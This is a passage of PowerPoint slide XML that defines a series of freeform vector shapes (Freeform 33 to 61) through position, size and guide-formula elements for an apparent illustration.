                  <a:gd name="T13" fmla="*/ 0 h 753"/>
                  <a:gd name="T14" fmla="*/ 0 w 1386"/>
                  <a:gd name="T15" fmla="*/ 0 h 753"/>
                  <a:gd name="T16" fmla="*/ 0 w 1386"/>
                  <a:gd name="T17" fmla="*/ 0 h 753"/>
                  <a:gd name="T18" fmla="*/ 0 w 1386"/>
                  <a:gd name="T19" fmla="*/ 0 h 753"/>
                  <a:gd name="T20" fmla="*/ 0 w 1386"/>
                  <a:gd name="T21" fmla="*/ 0 h 753"/>
                  <a:gd name="T22" fmla="*/ 0 w 1386"/>
                  <a:gd name="T23" fmla="*/ 0 h 753"/>
                  <a:gd name="T24" fmla="*/ 0 w 1386"/>
                  <a:gd name="T25" fmla="*/ 0 h 753"/>
                  <a:gd name="T26" fmla="*/ 0 w 1386"/>
                  <a:gd name="T27" fmla="*/ 0 h 753"/>
                  <a:gd name="T28" fmla="*/ 0 w 1386"/>
                  <a:gd name="T29" fmla="*/ 0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0" name="Freeform 33"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="452" y="3236"/>
                <a:ext cx="450" cy="246"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1351"/>
                  <a:gd name="T1" fmla="*/ 0 h 740"/>
                  <a:gd name="T2" fmla="*/ 0 w 1351"/>
                  <a:gd name="T3" fmla="*/ 0 h 740"/>
                  <a:gd name="T4" fmla="*/ 0 w 1351"/>
                  <a:gd name="T5" fmla="*/ 0 h 740"/>
                  <a:gd name="T6" fmla="*/ 0 w 1351"/>
                  <a:gd name="T7" fmla="*/ 0 h 740"/>
                  <a:gd name="T8" fmla="*/ 0 w 1351"/>
                  <a:gd name="T9" fmla="*/ 0 h 740"/>
                  <a:gd name="T10" fmla="*/ 0 w 1351"/>
                  <a:gd name="T11" fmla="*/ 0 h 740"/>
                  <a:gd name="T12" fmla="*/ 0 w 1351"/>
                  <a:gd name="T13" fmla="*/ 0 h 740"/>
                  <a:gd name="T14" fmla="*/ 0 w 1351"/>
                  <a:gd name="T15" fmla="*/ 0 h 740"/>
                  <a:gd name="T16" fmla="*/ 0 w 1351"/>
                  <a:gd name="T17" fmla="*/ 0 h 740"/>
                  <a:gd name="T18" fmla="*/ 0 w 1351"/>
                  <a:gd name="T19" fmla="*/ 0 h 740"/>
                  <a:gd name="T20" fmla="*/ 0 w 1351"/>
                  <a:gd name="T21" fmla="*/ 0 h 740"/>
                  <a:gd name="T22" fmla="*/ 0 w 1351"/>
                  <a:gd name="T23" fmla="*/ 0 h 740"/>
                  <a:gd name="T24" fmla="*/ 0 w 1351"/>
                  <a:gd name="T25" fmla="*/ 0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1" name="Freeform 34"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="799" y="3709"/>
                <a:ext cx="326" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 980"/>
                  <a:gd name="T1" fmla="*/ 0 h 93"/>
                  <a:gd name="T2" fmla="*/ 0 w 980"/>
                  <a:gd name="T3" fmla="*/ 0 h 93"/>
                  <a:gd name="T4" fmla="*/ 0 w 980"/>
                  <a:gd name="T5" fmla="*/ 0 h 93"/>
                  <a:gd name="T6" fmla="*/ 0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2" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="760" y="3028"/>
                <a:ext cx="740" cy="702"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2219"/>
                  <a:gd name="T1" fmla="*/ 0 h 2108"/>
                  <a:gd name="T2" fmla="*/ 0 w 2219"/>
                  <a:gd name="T3" fmla="*/ 0 h 2108"/>
                  <a:gd name="T4" fmla="*/ 0 w 2219"/>
                  <a:gd name="T5" fmla="*/ 0 h 2108"/>
                  <a:gd name="T6" fmla="*/ 0 w 2219"/>
                  <a:gd name="T7" fmla="*/ 0 h 2108"/>
                  <a:gd name="T8" fmla="*/ 0 w 2219"/>
                  <a:gd name="T9" fmla="*/ 0 h 2108"/>
                  <a:gd name="T10" fmla="*/ 0 w 2219"/>
                  <a:gd name="T11" fmla="*/ 0 h 2108"/>
                  <a:gd name="T12" fmla="*/ 0 w 2219"/>
                  <a:gd name="T13" fmla="*/ 0 h 2108"/>
                  <a:gd name="T14" fmla="*/ 0 w 2219"/>
                  <a:gd name="T15" fmla="*/ 0 h 2108"/>
                  <a:gd name="T16" fmla="*/ 0 w 2219"/>
                  <a:gd name="T17" fmla="*/ 0 h 2108"/>
                  <a:gd name="T18" fmla="*/ 0 w 2219"/>
                  <a:gd name="T19" fmla="*/ 0 h 2108"/>
                  <a:gd name="T20" fmla="*/ 0 w 2219"/>
                  <a:gd name="T21" fmla="*/ 0 h 2108"/>
                  <a:gd name="T22" fmla="*/ 0 w 2219"/>
                  <a:gd name="T23" fmla="*/ 0 h 2108"/>
                  <a:gd name="T24" fmla="*/ 0 w 2219"/>
                  <a:gd name="T25" fmla="*/ 0 h 2108"/>
                  <a:gd name="T26" fmla="*/ 0 w 2219"/>
                  <a:gd name="T27" fmla="*/ 0 h 2108"/>
                  <a:gd name="T28" fmla="*/ 0 w 2219"/>
                  <a:gd name="T29" fmla="*/ 0 h 2108"/>
                  <a:gd name="T30" fmla="*/ 0 w 2219"/>
                  <a:gd name="T31" fmla="*/ 0 h 2108"/>
                  <a:gd name="T32" fmla="*/ 0 w 2219"/>
                  <a:gd name="T33" fmla="*/ 0 h 2108"/>
                  <a:gd name="T34" fmla="*/ 0 w 2219"/>
                  <a:gd name="T35" fmla="*/ 0 h 2108"/>
                  <a:gd name="T36" fmla="*/ 0 w 2219"/>
                  <a:gd name="T37" fmla="*/ 0 h 2108"/>
                  <a:gd name="T38" fmla="*/ 0 w 2219"/>
                  <a:gd name="T39" fmla="*/ 0 h 2108"/>
                  <a:gd name="T40" fmla="*/ 0 w 2219"/>
                  <a:gd name="T41" fmla="*/ 0 h 2108"/>
                  <a:gd name="T42" fmla="*/ 0 w 2219"/>
                  <a:gd name="T43" fmla="*/ 0 h 2108"/>
                  <a:gd name="T44" fmla="*/ 0 w 2219"/>
                  <a:gd name="T45" fmla="*/ 0 h 2108"/>
                  <a:gd name="T46" fmla="*/ 0 w 2219"/>
                  <a:gd name="T47" fmla="*/ 0 h 2108"/>
                  <a:gd name="T48" fmla="*/ 0 w 2219"/>
                  <a:gd name="T49" fmla="*/ 0 h 2108"/>
                  <a:gd name="T50" fmla="*/ 0 w 2219"/>
                  <a:gd name="T51" fmla="*/ 0 h 2108"/>
                  <a:gd name="T52" fmla="*/ 0 w 2219"/>
                  <a:gd name="T53" fmla="*/ 0 h 2108"/>
                  <a:gd name="T54" fmla="*/ 0 w 2219"/>
                  <a:gd name="T55" fmla="*/ 0 h 2108"/>
                  <a:gd name="T56" fmla="*/ 0 w 2219"/>
                  <a:gd name="T57" fmla="*/ 0 h 2108"/>
                  <a:gd name="T58" fmla="*/ 0 w 2219"/>
                  <a:gd name="T59" fmla="*/ 0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3" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="498" y="3790"/>
                <a:ext cx="1052" cy="157"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3155"/>
                  <a:gd name="T1" fmla="*/ 0 h 470"/>
                  <a:gd name="T2" fmla="*/ 0 w 3155"/>
                  <a:gd name="T3" fmla="*/ 0 h 470"/>
                  <a:gd name="T4" fmla="*/ 0 w 3155"/>
                  <a:gd name="T5" fmla="*/ 0 h 470"/>
                  <a:gd name="T6" fmla="*/ 0 w 3155"/>
                  <a:gd name="T7" fmla="*/ 0 h 470"/>
                  <a:gd name="T8" fmla="*/ 0 w 3155"/>
                  <a:gd name="T9" fmla="*/ 0 h 470"/>
                  <a:gd name="T10" fmla="*/ 0 w 3155"/>
                  <a:gd name="T11" fmla="*/ 0 h 470"/>
                  <a:gd name="T12" fmla="*/ 0 w 3155"/>
                  <a:gd name="T13" fmla="*/ 0 h 470"/>
                  <a:gd name="T14" fmla="*/ 0 w 3155"/>
                  <a:gd name="T15" fmla="*/ 0 h 470"/>
                  <a:gd name="T16" fmla="*/ 0 w 3155"/>
                  <a:gd name="T17" fmla="*/ 0 h 470"/>
                  <a:gd name="T18" fmla="*/ 0 w 3155"/>
                  <a:gd name="T19" fmla="*/ 0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4" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="828" y="3757"/>
                <a:ext cx="63" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 93"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 93"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 93"/>
                  <a:gd name="T6" fmla="*/ 0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5" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="924" y="3762"/>
                <a:ext cx="60" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 182"/>
                  <a:gd name="T1" fmla="*/ 0 h 98"/>
                  <a:gd name="T2" fmla="*/ 0 w 182"/>
                  <a:gd name="T3" fmla="*/ 0 h 98"/>
                  <a:gd name="T4" fmla="*/ 0 w 182"/>
                  <a:gd name="T5" fmla="*/ 0 h 98"/>
                  <a:gd name="T6" fmla="*/ 0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6" name="Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1033" y="3765"/>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7" name="Freeform 40"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1134" y="3770"/>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8" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks/>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9" name="Freeform 42"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="967" y="3801"/>
                <a:ext cx="62" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 188"/>
                  <a:gd name="T1" fmla="*/ 0 h 94"/>
                  <a:gd name="T2" fmla="*/ 0 w 188"/>
                  <a:gd name="T3" fmla="*/ 0 h 94"/>
                  <a:gd name="T4" fmla="*/ 0 w 188"/>
                  <a:gd name="T5" fmla="*/ 0 h 94"/>
                  <a:gd name="T6" fmla="*/ 0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0" name="Freeform 43"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1062" y="3807"/>
                <a:ext cx="61" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 182"/>
                  <a:gd name="T1" fmla="*/ 0 h 97"/>
                  <a:gd name="T2" fmla="*/ 0 w 182"/>
                  <a:gd name="T3" fmla="*/ 0 h 97"/>
                  <a:gd name="T4" fmla="*/ 0 w 182"/>
                  <a:gd name="T5" fmla="*/ 0 h 97"/>
                  <a:gd name="T6" fmla="*/ 0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1" name="Freeform 44"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1171" y="3810"/>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2" name="Freeform 45"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1272" y="3814"/>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3" name="Freeform 46"/>
              <p:cNvSpPr>
                <a:spLocks/>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4" name="Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="652" y="3823"/>
                <a:ext cx="72" cy="36"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 216"/>
                  <a:gd name="T1" fmla="*/ 0 h 108"/>
                  <a:gd name="T2" fmla="*/ 0 w 216"/>
                  <a:gd name="T3" fmla="*/ 0 h 108"/>
                  <a:gd name="T4" fmla="*/ 0 w 216"/>
                  <a:gd name="T5" fmla="*/ 0 h 108"/>
                  <a:gd name="T6" fmla="*/ 0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5" name="Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="762" y="3830"/>
                <a:ext cx="71" cy="38"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 212"/>
                  <a:gd name="T1" fmla="*/ 0 h 113"/>
                  <a:gd name="T2" fmla="*/ 0 w 212"/>
                  <a:gd name="T3" fmla="*/ 0 h 113"/>
                  <a:gd name="T4" fmla="*/ 0 w 212"/>
                  <a:gd name="T5" fmla="*/ 0 h 113"/>
                  <a:gd name="T6" fmla="*/ 0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6" name="Freeform 49"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="888" y="3833"/>
                <a:ext cx="61" cy="43"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 184"/>
                  <a:gd name="T1" fmla="*/ 0 h 128"/>
                  <a:gd name="T2" fmla="*/ 0 w 184"/>
                  <a:gd name="T3" fmla="*/ 0 h 128"/>
                  <a:gd name="T4" fmla="*/ 0 w 184"/>
                  <a:gd name="T5" fmla="*/ 0 h 128"/>
                  <a:gd name="T6" fmla="*/ 0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7" name="Freeform 50"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1005" y="3838"/>
                <a:ext cx="50" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 151"/>
                  <a:gd name="T1" fmla="*/ 0 h 126"/>
                  <a:gd name="T2" fmla="*/ 0 w 151"/>
                  <a:gd name="T3" fmla="*/ 0 h 126"/>
                  <a:gd name="T4" fmla="*/ 0 w 151"/>
                  <a:gd name="T5" fmla="*/ 0 h 126"/>
                  <a:gd name="T6" fmla="*/ 0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8" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1131" y="3849"/>
                <a:ext cx="46" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 138"/>
                  <a:gd name="T1" fmla="*/ 0 h 97"/>
                  <a:gd name="T2" fmla="*/ 0 w 138"/>
                  <a:gd name="T3" fmla="*/ 0 h 97"/>
                  <a:gd name="T4" fmla="*/ 0 w 138"/>
                  <a:gd name="T5" fmla="*/ 0 h 97"/>
                  <a:gd name="T6" fmla="*/ 0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9" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="758" y="3054"/>
                <a:ext cx="89" cy="99"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 267"/>
                  <a:gd name="T1" fmla="*/ 0 h 295"/>
                  <a:gd name="T2" fmla="*/ 0 w 267"/>
                  <a:gd name="T3" fmla="*/ 0 h 295"/>
                  <a:gd name="T4" fmla="*/ 0 w 267"/>
                  <a:gd name="T5" fmla="*/ 0 h 295"/>
                  <a:gd name="T6" fmla="*/ 0 w 267"/>
                  <a:gd name="T7" fmla="*/ 0 h 295"/>
                  <a:gd name="T8" fmla="*/ 0 w 267"/>
                  <a:gd name="T9" fmla="*/ 0 h 295"/>
                  <a:gd name="T10" fmla="*/ 0 w 267"/>
                  <a:gd name="T11" fmla="*/ 0 h 295"/>
                  <a:gd name="T12" fmla="*/ 0 w 267"/>
                  <a:gd name="T13" fmla="*/ 0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0" name="Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1267" y="3044"/>
                <a:ext cx="108" cy="128"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 324"/>
                  <a:gd name="T1" fmla="*/ 0 h 383"/>
                  <a:gd name="T2" fmla="*/ 0 w 324"/>
                  <a:gd name="T3" fmla="*/ 0 h 383"/>
                  <a:gd name="T4" fmla="*/ 0 w 324"/>
                  <a:gd name="T5" fmla="*/ 0 h 383"/>
                  <a:gd name="T6" fmla="*/ 0 w 324"/>
                  <a:gd name="T7" fmla="*/ 0 h 383"/>
                  <a:gd name="T8" fmla="*/ 0 w 324"/>
                  <a:gd name="T9" fmla="*/ 0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1" name="Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="820" y="3278"/>
                <a:ext cx="490" cy="315"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1471"/>
                  <a:gd name="T1" fmla="*/ 0 h 944"/>
                  <a:gd name="T2" fmla="*/ 0 w 1471"/>
                  <a:gd name="T3" fmla="*/ 0 h 944"/>
                  <a:gd name="T4" fmla="*/ 0 w 1471"/>
                  <a:gd name="T5" fmla="*/ 0 h 944"/>
                  <a:gd name="T6" fmla="*/ 0 w 1471"/>
                  <a:gd name="T7" fmla="*/ 0 h 944"/>
                  <a:gd name="T8" fmla="*/ 0 w 1471"/>
                  <a:gd name="T9" fmla="*/ 0 h 944"/>
                  <a:gd name="T10" fmla="*/ 0 w 1471"/>
                  <a:gd name="T11" fmla="*/ 0 h 944"/>
                  <a:gd name="T12" fmla="*/ 0 w 1471"/>
                  <a:gd name="T13" fmla="*/ 0 h 944"/>
                  <a:gd name="T14" fmla="*/ 0 w 1471"/>
                  <a:gd name="T15" fmla="*/ 0 h 944"/>
                  <a:gd name="T16" fmla="*/ 0 w 1471"/>
                  <a:gd name="T17" fmla="*/ 0 h 944"/>
                  <a:gd name="T18" fmla="*/ 0 w 1471"/>
                  <a:gd name="T19" fmla="*/ 0 h 944"/>
                  <a:gd name="T20" fmla="*/ 0 w 1471"/>
                  <a:gd name="T21" fmla="*/ 0 h 944"/>
                  <a:gd name="T22" fmla="*/ 0 w 1471"/>
                  <a:gd name="T23" fmla="*/ 0 h 944"/>
                  <a:gd name="T24" fmla="*/ 0 w 1471"/>
                  <a:gd name="T25" fmla="*/ 0 h 944"/>
                  <a:gd name="T26" fmla="*/ 0 w 1471"/>
                  <a:gd name="T27" fmla="*/ 0 h 944"/>
                  <a:gd name="T28" fmla="*/ 0 w 1471"/>
                  <a:gd name="T29" fmla="*/ 0 h 944"/>
                  <a:gd name="T30" fmla="*/ 0 w 1471"/>
                  <a:gd name="T31" fmla="*/ 0 h 944"/>
                  <a:gd name="T32" fmla="*/ 0 w 1471"/>
                  <a:gd name="T33" fmla="*/ 0 h 944"/>
                  <a:gd name="T34" fmla="*/ 0 w 1471"/>
                  <a:gd name="T35" fmla="*/ 0 h 944"/>
                  <a:gd name="T36" fmla="*/ 0 w 1471"/>
                  <a:gd name="T37" fmla="*/ 0 h 944"/>
                  <a:gd name="T38" fmla="*/ 0 w 1471"/>
                  <a:gd name="T39" fmla="*/ 0 h 944"/>
                  <a:gd name="T40" fmla="*/ 0 w 1471"/>
                  <a:gd name="T41" fmla="*/ 0 h 944"/>
                  <a:gd name="T42" fmla="*/ 0 w 1471"/>
                  <a:gd name="T43" fmla="*/ 0 h 944"/>
                  <a:gd name="T44" fmla="*/ 0 w 1471"/>
                  <a:gd name="T45" fmla="*/ 0 h 944"/>
                  <a:gd name="T46" fmla="*/ 0 w 1471"/>
                  <a:gd name="T47" fmla="*/ 0 h 944"/>
                  <a:gd name="T48" fmla="*/ 0 w 1471"/>
                  <a:gd name="T49" fmla="*/ 0 h 944"/>
                  <a:gd name="T50" fmla="*/ 0 w 1471"/>
                  <a:gd name="T51" fmla="*/ 0 h 944"/>
                  <a:gd name="T52" fmla="*/ 0 w 1471"/>
                  <a:gd name="T53" fmla="*/ 0 h 944"/>
                  <a:gd name="T54" fmla="*/ 0 w 1471"/>
                  <a:gd name="T55" fmla="*/ 0 h 944"/>
                  <a:gd name="T56" fmla="*/ 0 w 1471"/>
                  <a:gd name="T57" fmla="*/ 0 h 944"/>
                  <a:gd name="T58" fmla="*/ 0 w 1471"/>
                  <a:gd name="T59" fmla="*/ 0 h 944"/>
                  <a:gd name="T60" fmla="*/ 0 w 1471"/>
                  <a:gd name="T61" fmla="*/ 0 h 944"/>
                  <a:gd name="T62" fmla="*/ 0 w 1471"/>
                  <a:gd name="T63" fmla="*/ 0 h 944"/>
                  <a:gd name="T64" fmla="*/ 0 w 1471"/>
                  <a:gd name="T65" fmla="*/ 0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2" name="Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="904" y="3400"/>
                <a:ext cx="341" cy="61"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1023"/>
                  <a:gd name="T1" fmla="*/ 0 h 182"/>
                  <a:gd name="T2" fmla="*/ 0 w 1023"/>
                  <a:gd name="T3" fmla="*/ 0 h 182"/>
                  <a:gd name="T4" fmla="*/ 0 w 1023"/>
                  <a:gd name="T5" fmla="*/ 0 h 182"/>
                  <a:gd name="T6" fmla="*/ 0 w 1023"/>
                  <a:gd name="T7" fmla="*/ 0 h 182"/>
                  <a:gd name="T8" fmla="*/ 0 w 1023"/>
                  <a:gd name="T9" fmla="*/ 0 h 182"/>
                  <a:gd name="T10" fmla="*/ 0 w 1023"/>
                  <a:gd name="T11" fmla="*/ 0 h 182"/>
                  <a:gd name="T12" fmla="*/ 0 w 1023"/>
                  <a:gd name="T13" fmla="*/ 0 h 182"/>
                  <a:gd name="T14" fmla="*/ 0 w 1023"/>
                  <a:gd name="T15" fmla="*/ 0 h 182"/>
                  <a:gd name="T16" fmla="*/ 0 w 1023"/>
                  <a:gd name="T17" fmla="*/ 0 h 182"/>
                  <a:gd name="T18" fmla="*/ 0 w 1023"/>
                  <a:gd name="T19" fmla="*/ 0 h 182"/>
                  <a:gd name="T20" fmla="*/ 0 w 1023"/>
                  <a:gd name="T21" fmla="*/ 0 h 182"/>
                  <a:gd name="T22" fmla="*/ 0 w 1023"/>
                  <a:gd name="T23" fmla="*/ 0 h 182"/>
                  <a:gd name="T24" fmla="*/ 0 w 1023"/>
                  <a:gd name="T25" fmla="*/ 0 h 182"/>
                  <a:gd name="T26" fmla="*/ 0 w 1023"/>
                  <a:gd name="T27" fmla="*/ 0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3" name="Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="872" y="3127"/>
                <a:ext cx="64" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 194"/>
                  <a:gd name="T1" fmla="*/ 0 h 192"/>
                  <a:gd name="T2" fmla="*/ 0 w 194"/>
                  <a:gd name="T3" fmla="*/ 0 h 192"/>
                  <a:gd name="T4" fmla="*/ 0 w 194"/>
                  <a:gd name="T5" fmla="*/ 0 h 192"/>
                  <a:gd name="T6" fmla="*/ 0 w 194"/>
                  <a:gd name="T7" fmla="*/ 0 h 192"/>
                  <a:gd name="T8" fmla="*/ 0 w 194"/>
                  <a:gd name="T9" fmla="*/ 0 h 192"/>
                  <a:gd name="T10" fmla="*/ 0 w 194"/>
                  <a:gd name="T11" fmla="*/ 0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4" name="Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1196" y="3120"/>
                <a:ext cx="63" cy="87"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 261"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 261"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 0 h 261"/>
                  <a:gd name="T6" fmla="*/ 0 w 187"/>
                  <a:gd name="T7" fmla="*/ 0 h 261"/>
                  <a:gd name="T8" fmla="*/ 0 w 187"/>
                  <a:gd name="T9" fmla="*/ 0 h 261"/>
                  <a:gd name="T10" fmla="*/ 0 w 187"/>
                  <a:gd name="T11" fmla="*/ 0 h 261"/>
                  <a:gd name="T12" fmla="*/ 0 w 187"/>
                  <a:gd name="T13" fmla="*/ 0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5" name="Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1029" y="3308"/>
                <a:ext cx="85" cy="4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6" name="Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="903" y="3256"/>
                <a:ext cx="93" cy="54"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 277"/>
                  <a:gd name="T1" fmla="*/ 0 h 162"/>
                  <a:gd name="T2" fmla="*/ 0 w 277"/>
                  <a:gd name="T3" fmla="*/ 0 h 162"/>
                  <a:gd name="T4" fmla="*/ 0 w 277"/>
                  <a:gd name="T5" fmla="*/ 0 h 162"/>
                  <a:gd name="T6" fmla="*/ 0 w 277"/>
                  <a:gd name="T7" fmla="*/ 0 h 162"/>
                  <a:gd name="T8" fmla="*/ 0 w 277"/>
                  <a:gd name="T9" fmla="*/ 0 h 162"/>
                  <a:gd name="T10" fmla="*/ 0 w 277"/>
                  <a:gd name="T11" fmla="*/ 0 h 162"/>
                  <a:gd name="T12" fmla="*/ 0 w 277"/>
                  <a:gd name="T13" fmla="*/ 0 h 162"/>
                  <a:gd name="T14" fmla="*/ 0 w 277"/>
                  <a:gd name="T15" fmla="*/ 0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7" name="Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1158" y="3270"/>
                <a:ext cx="99" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 298"/>
                  <a:gd name="T1" fmla="*/ 0 h 147"/>
                  <a:gd name="T2" fmla="*/ 0 w 298"/>
                  <a:gd name="T3" fmla="*/ 0 h 147"/>
                  <a:gd name="T4" fmla="*/ 0 w 298"/>
                  <a:gd name="T5" fmla="*/ 0 h 147"/>
                  <a:gd name="T6" fmla="*/ 0 w 298"/>
                  <a:gd name="T7" fmla="*/ 0 h 147"/>
                  <a:gd name="T8" fmla="*/ 0 w 298"/>
                  <a:gd name="T9" fmla="*/ 0 h 147"/>
                  <a:gd name="T10" fmla="*/ 0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8" name="Freeform 61"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
